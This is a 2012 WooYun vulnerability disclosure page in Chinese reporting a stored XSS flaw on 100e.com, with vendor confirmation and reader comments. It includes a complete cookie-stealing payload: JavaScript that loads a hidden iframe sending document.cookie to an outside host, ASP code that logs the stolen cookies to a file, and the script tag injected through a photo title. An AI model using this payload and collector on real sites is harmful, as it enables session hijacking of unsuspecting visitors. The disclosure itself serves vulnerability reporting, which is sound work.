当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013059

漏洞标题:100e一百易 储存型XSS

相关厂商:100e.com

漏洞作者: GuoKer(ZhuLiu)

提交时间:2012-10-06 17:28

修复时间:2012-11-20 17:29

公开时间:2012-11-20 17:29

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-10-06: 细节已通知厂商并且等待厂商处理中
2012-10-08: 厂商已经确认,细节仅向厂商公开
2012-10-18: 细节向核心白帽子及相关领域专家公开
2012-10-28: 细节向普通白帽子公开
2012-11-07: 细节向实习白帽子公开
2012-11-20: 细节向公众公开

简要描述:

http://www.100e.com/ 进入首页即可触发XSS 测试可以无声无息的盗取了cookie ,应该还可以融虫吧,表示没试过 PS:好久没上乌云了......

详细说明:

利用:



在个人管理里面选择上传照片 然后照片随便 标题就写 XSS代码 这次测试的是 盗取 cookie
JS代码
var str=escape(window.location.pathname);
cv=escape(document.cookie);
function f()
{
ifm=document.createElement("IFRAME");
document.body.appendChild(ifm);
ifm.width=0;
ifm.height=0;
ifm.src="http://www.xxxx.com/1.asp?s="+str+"|"+cv;
}
setTimeout(f,"1000");
ASP代码
<%
s=request("s")
if s <> "" then
set fso=Server.CreateObject("Scripting.FileSystemObject")
with fso.opentextfile(server.mappath("1.txt"),8,true)
.writeline s
.close
End with
end if
%>
触发后会在当前目录生成1.txt并把截取到的cookie放进去
然后在照片标题处写 <script src=http://xxxxxxxxx.com/1.js>
保存
这时再打开首页 会和往常一样正常,不过你的cookie已经被截取了,发往了某网站空间里面的1.txt文件里

漏洞证明:

修复方案:

过滤一下关键字

版权声明:转载请注明来源 GuoKer(ZhuLiu)@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-10-08 09:05

厂商回复:

谢谢guoker提醒

最新状态:

暂无


漏洞评价:

评论

  1. 2012-10-06 18:42 | roofsec ( 普通白帽子 | Rank:151 漏洞数:19 )

    我说怎么 没通过审核呢 原来是你这个木JJ 发了啊

  2. 2012-10-06 19:10 | GuoKer(ZhuLiu) ( 普通白帽子 | Rank:168 漏洞数:21 | 在校学生党的路过 霸气侧漏)

    你发的方式应该不对吧......而且我发的再你之后......

  3. 2012-10-06 19:35 | roofsec ( 普通白帽子 | Rank:151 漏洞数:19 )

    @GuoKer(ZhuLiu) 恩恩 可能是。

  4. 2012-10-08 10:31 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @100e一百易请认真正确评估漏洞的影响